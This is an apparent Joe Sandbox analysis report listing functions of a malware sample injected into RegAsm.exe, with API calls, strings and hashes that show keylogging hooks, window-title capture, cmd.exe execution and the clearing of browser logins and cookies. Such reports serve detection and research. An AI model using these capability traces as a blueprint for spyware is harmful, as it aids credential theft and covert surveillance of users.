                                                                                Similarity
                                                                                • API ID: Window$Console$Show$AllocCreateForegroundOutputThread
                                                                                • String ID: !D@
                                                                                • API String ID: 186401046-604454484
                                                                                • Opcode ID: 66a4db702971166e51169c96c42166a39a03490b62fdad1c1d9be1af324f9392
                                                                                • Instruction ID: 9f5213224becab59645eda34593d96b16d6ada18beeab21aaf628210512d7754
                                                                                • Opcode Fuzzy Hash: 66a4db702971166e51169c96c42166a39a03490b62fdad1c1d9be1af324f9392
                                                                                • Instruction Fuzzy Hash: ECF05E70149340EAD720AB62ED45AFA7B69EB54341F01487BF909C20F2DB389C94865E
                                                                                Function 00416129 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041616B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExecuteShell
                                                                                • String ID: /C $cmd.exe$open
                                                                                • API String ID: 587946157-3896048727
                                                                                • Opcode ID: 6b954565fb865431a8f0571ad86dfb8a094b841cbf93f4f8f4d3cab274959172
                                                                                • Instruction ID: 08f4dee505367bf09000beb2be63de5ecd082ae46aa0e0363999309db21c3e05
                                                                                • Opcode Fuzzy Hash: 6b954565fb865431a8f0571ad86dfb8a094b841cbf93f4f8f4d3cab274959172
                                                                                • Instruction Fuzzy Hash: 5EE0C0B0204305ABC605F675DC96CBF73ADAA94749B50483F7142A20E2EF7C9D49C65D
                                                                                Function 0040B8E7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,34,004752F0,?,pth_unenc), ref: 0040B8F6
                                                                                • UnhookWindowsHookEx.USER32 ref: 0040B902
                                                                                • TerminateThread.KERNEL32(0040A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: TerminateThread$HookUnhookWindows
                                                                                • String ID: pth_unenc
                                                                                • API String ID: 3123878439-4028850238
                                                                                • Opcode ID: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                                                                                • Instruction ID: 372ac16de24f92ae7b862ff59389ff52a9cc8b3ac2037ffe6dc6d1e564519698
                                                                                • Opcode Fuzzy Hash: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                                                                                • Instruction Fuzzy Hash: 71E01272204315EFD7201F909C888667AADEE1539632409BEF6C261BB6CB7D4C54C79D
                                                                                Function 0040140A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProc
                                                                                • String ID: GetCursorInfo$User32.dll
                                                                                • API String ID: 1646373207-2714051624
                                                                                • Opcode ID: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                                                                • Instruction ID: 8b26e8b19aea132afe7ec2793fcae50f4a2deac5c44528798ee909e27cd98dc2
                                                                                • Opcode Fuzzy Hash: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                                                                • Instruction Fuzzy Hash: 6BB092B4981740FB8F102BB0AE4EA193A25B614703B1008B6F046961A2EBB888009A2E
                                                                                Function 004014AF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(User32.dll), ref: 004014B9
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: GetLastInputInfo$User32.dll
                                                                                • API String ID: 2574300362-1519888992
                                                                                • Opcode ID: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                                                                                • Instruction ID: d02e03e3b89f99dad65f23c179d95e13f318a7fd709defe56253aab8848571e2
                                                                                • Opcode Fuzzy Hash: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                                                                                • Instruction Fuzzy Hash: EFB092B8580300FBCB102FA0AD4E91E3A68AA18703B1008A7F441C21A1EBB888009F5F
                                                                                Function 0044A084 Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: __alldvrm$_strrchr
                                                                                • String ID:
                                                                                • API String ID: 1036877536-0
                                                                                • Opcode ID: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                                                                • Instruction ID: 8ce1af842cd152cb2b2428f5d584a25f6c9224aafe101b92c03b71ca88d34985
                                                                                • Opcode Fuzzy Hash: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                                                                • Instruction Fuzzy Hash: 87A156729846829FF721CF58C8817AEBBA5FF15314F2841AFE8859B381D27C8C51C75A
                                                                                Function 00456C9A Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free
                                                                                • String ID:
                                                                                • API String ID: 269201875-0
                                                                                • Opcode ID: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                                                                                • Instruction ID: 6f8591e81a910498abf0b0e408487d1c0faf04506bf4bd3dd9e850377c22d226
                                                                                • Opcode Fuzzy Hash: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                                                                                • Instruction Fuzzy Hash: 34413931B00104AAEB207B7A9C4666F3AB5DF45735F570A1FFD28C7293DA7C481D426A
                                                                                Function 00442851 Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                                                • Instruction ID: b0a34e1ed6630e1fb57c9e62860a3601010315cd62f19612bff23542d182db60
                                                                                • Opcode Fuzzy Hash: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                                                • Instruction Fuzzy Hash: 70412AB1600704BFE724AF79CD41B5EBBE8EB88714F10462FF145DB281E3B999058798
                                                                                Function 100086E4 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,10006FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 10008731
                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 100087BA
                                                                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 100087CC
                                                                                • __freea.LIBCMT ref: 100087D5
                                                                                  • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                • String ID:
                                                                                • API String ID: 2652629310-0
                                                                                • Opcode ID: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                                • Instruction ID: 5b9b35b0a4db414dac5c81271493033b4f2f0f3dd9b893eeefd60fa04c8ec889
                                                                                • Opcode Fuzzy Hash: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                                • Instruction Fuzzy Hash: 2731AE32A0021AABEF15CF64CC85EAF7BA5EF44290F214129FC48D7158EB35DE50CBA0
                                                                                Function 0040C047 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                • [Cleared browsers logins and cookies.], xrefs: 0040C11F
                                                                                • Cleared browsers logins and cookies., xrefs: 0040C130
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Sleep
                                                                                • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                                • API String ID: 3472027048-1236744412
                                                                                • Opcode ID: af2c2d963010d4b9fe0ed32b7540b86f028afa125e63126aea6004068ef018c7
                                                                                • Instruction ID: 5a72b8a34604a64e244bad04561a930bad76f77e78bf22f3e088d6afb7384554
                                                                                • Opcode Fuzzy Hash: af2c2d963010d4b9fe0ed32b7540b86f028afa125e63126aea6004068ef018c7
                                                                                • Instruction Fuzzy Hash: A431A805648381EDD6116BF514967AB7B824A53748F0882BFB8C4373C3DA7A4808C79F
                                                                                Function 004194FF Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • EnumDisplayMonitors.USER32(00000000,00000000,0041960A,00000000), ref: 00419530
                                                                                • EnumDisplayDevicesW.USER32(?), ref: 00419560
                                                                                • EnumDisplayDevicesW.USER32(?,?,?,00000000), ref: 004195D5
                                                                                • EnumDisplayDevicesW.USER32(00000000,00000000,?,00000000), ref: 004195F2
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: DisplayEnum$Devices$Monitors
                                                                                • String ID:
                                                                                • API String ID: 1432082543-0
                                                                                • Opcode ID: 307544a1efd678830df2dab17394228d9bd71c3d3133ae3f2bbfdbf915fafe35
                                                                                • Instruction ID: 2d7c1ce958f8de7f9ce17d43b909e87ea7509c435c2805f0bc90a8abde121c81
                                                                                • Opcode Fuzzy Hash: 307544a1efd678830df2dab17394228d9bd71c3d3133ae3f2bbfdbf915fafe35
                                                                                • Instruction Fuzzy Hash: 232180721083146BD221DF26DC89EABBBECEBD1754F00053FF45AD3190EB749A49C66A
                                                                                Function 00412716 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 93sleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00413733: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 0041374F
                                                                                  • Part of subcall function 00413733: RegQueryValueExA.KERNEL32 ref: 00413768
                                                                                  • Part of subcall function 00413733: RegCloseKey.KERNEL32(00000000), ref: 00413773
                                                                                • Sleep.KERNEL32(00000BB8), ref: 004127B5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseOpenQuerySleepValue
                                                                                • String ID: 8SG$exepath$34
                                                                                • API String ID: 4119054056-609515032
                                                                                • Opcode ID: 2623c7753db8338a8ecc8f8a9aff935ef8b7f52fc7af967014f204662f36537b
                                                                                • Instruction ID: 51bf296395b05d3efeb7b41814c334b1d8e13e95dfba71b8de44539041ec8c28
                                                                                • Opcode Fuzzy Hash: 2623c7753db8338a8ecc8f8a9aff935ef8b7f52fc7af967014f204662f36537b
                                                                                • Instruction Fuzzy Hash: 3521F4A1B003042BD604B6365D4AAAF724D8B80318F40897FBA56E72D3DFBC9D45826D
                                                                                Function 10001CCA Relevance: 6.1, APIs: 4, Instructions: 84fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D58
                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 10001D72
                                                                                • CloseHandle.KERNEL32(00000000), ref: 10001D7D
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: File$CloseHandleReadSize
                                                                                • String ID:
                                                                                • API String ID: 3642004256-0
                                                                                • Opcode ID: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                                • Instruction ID: 3114db45d92e83daf92c47a85baf70c14dd0292bf94a6379629bf72341f68b19
                                                                                • Opcode Fuzzy Hash: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                                • Instruction Fuzzy Hash: 2221FCB594122CAFF710EBA08CCCFEF76ACEB08395F010566F515D2154D6709E458A70
                                                                                Function 0040A564 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0041C5E2: GetForegroundWindow.USER32 ref: 0041C5F2
                                                                                  • Part of subcall function 0041C5E2: GetWindowTextLengthW.USER32 ref: 0041C5FB
                                                                                  • Part of subcall function 0041C5E2: GetWindowTextW.USER32 ref: 0041C625
                                                                                • Sleep.KERNEL32(000001F4), ref: 0040A5AE
                                                                                • Sleep.KERNEL32(00000064), ref: 0040A638
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Window$SleepText$ForegroundLength
                                                                                • String ID: [ $ ]
                                                                                • API String ID: 3309952895-93608704
                                                                                • Opcode ID: e3c1de537be80067876ef70e6a789dfde08fa912f151d6d6ce86b7d0ea258fd3
                                                                                • Instruction ID: 6255842b65d5da3793f092b3f1447ea5db7efb23f61c0c2d19f8aa6a86066f85
                                                                                • Opcode Fuzzy Hash: e3c1de537be80067876ef70e6a789dfde08fa912f151d6d6ce86b7d0ea258fd3
                                                                                • Instruction Fuzzy Hash: CB119F315143006BC614BB26CC579AF77A8AB90348F40083FF552661E3EF79AE18869B
                                                                                Function 0041B890 Relevance: 6.1, APIs: 4, Instructions: 63timesleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: SystemTimes$Sleep__aulldiv
                                                                                • String ID:
                                                                                • API String ID: 188215759-0
                                                                                • Opcode ID: 32d4930cb2be9b30136c829dd369e4a23351f3455ccfda4be26c85d87a7cef4d
                                                                                • Instruction ID: 634937a4cd8d43e921f59083ecd148feda9109121ee8127270144c35be039893
                                                                                • Opcode Fuzzy Hash: 32d4930cb2be9b30136c829dd369e4a23351f3455ccfda4be26c85d87a7cef4d
                                                                                • Instruction Fuzzy Hash: D01133B35043456BC304EAB5CD85DEF779CEBC4358F040A3EF64982061EE29E94986A6
                                                                                Function 00443B52 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d36049e99d51c5662ea1cdccde7f001ca18baa555cb14a41c95be32ad22d597f
                                                                                • Instruction ID: 437de9af4247593539f95cdbb70b1dc5411192884b5f12beac7b10196549b189
                                                                                • Opcode Fuzzy Hash: d36049e99d51c5662ea1cdccde7f001ca18baa555cb14a41c95be32ad22d597f
                                                                                • Instruction Fuzzy Hash: CB01ADB26096527ABA202E796CC5E27634CDB42BBA335037BF821512E3DF68DE054169
                                                                                Function 004398E3 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ___BuildCatchObject.LIBVCRUNTIME ref: 004398FA
                                                                                  • Part of subcall function 00439F32: ___AdjustPointer.LIBCMT ref: 00439F7C
                                                                                • _UnwindNestedFrames.LIBCMT ref: 00439911
                                                                                • ___FrameUnwindToState.LIBVCRUNTIME ref: 00439923
                                                                                • CallCatchBlock.LIBVCRUNTIME ref: 00439947
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                • String ID:
                                                                                • API String ID: 2633735394-0
                                                                                • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                                • Instruction ID: 1eef882e9718bbd9a0ab38cd68ce054dbb3f9d4064fa539f417e17899f1f7293
                                                                                • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                                • Instruction Fuzzy Hash: 38010532000109BBCF125F56CC01EDA3BAAEF5C754F05901AF95865221C3BAE862ABA4
                                                                                Function 0041941E Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MetricsSystem
                                                                                • String ID:
                                                                                • API String ID: 4116985748-0
                                                                                • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                                                • Instruction ID: fd4820a3fb0c8fcfb80096478546269f04700e3de9cdf271d69d174aa35805c7
                                                                                • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                                                • Instruction Fuzzy Hash: 3FF0A4B1B043155BD700EE758C51A6B6ADAEBD4364F10043FF60887281EFB8DC468B84
                                                                                Function 00438FB1 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438FB1
                                                                                • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438FB6
                                                                                • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438FBB
                                                                                  • Part of subcall function 0043A4BA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A4CB
                                                                                • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438FD0
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                • String ID:
                                                                                • API String ID: 1761009282-0
                                                                                • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                                • Instruction ID: 3a6c9073cd349407f79861cc5a63413a30b4b1af88e8d748f4708d1390bfb410
                                                                                • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                                • Instruction Fuzzy Hash: 8DC04C44080381552C50B6B2110B2AF83521C7E38CF9074DFBDD1579474D5D052F553F
                                                                                Function 00442CAD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __startOneArgErrorHandling.LIBCMT ref: 00442D3D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorHandling__start
                                                                                • String ID: pow
                                                                                • API String ID: 3213639722-2276729525
                                                                                • Opcode ID: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                                                                • Instruction ID: 2abd0c7c8e13d4a8cd2c8141c546921d868ac315c0d238e81b652aa6ec7fde8b
                                                                                • Opcode Fuzzy Hash: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                                                                • Instruction Fuzzy Hash: 92515AE1E0460296FB167714CE4137B6794AB50741F70497BF0D6823EAEA7C8C859B4F
                                                                                Function 100063F0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _free.LIBCMT ref: 1000655C
                                                                                  • Part of subcall function 100062BC: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100062BE
                                                                                  • Part of subcall function 100062BC: GetCurrentProcess.KERNEL32(C0000417), ref: 100062E0
                                                                                  • Part of subcall function 100062BC: TerminateProcess.KERNEL32(00000000), ref: 100062E7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
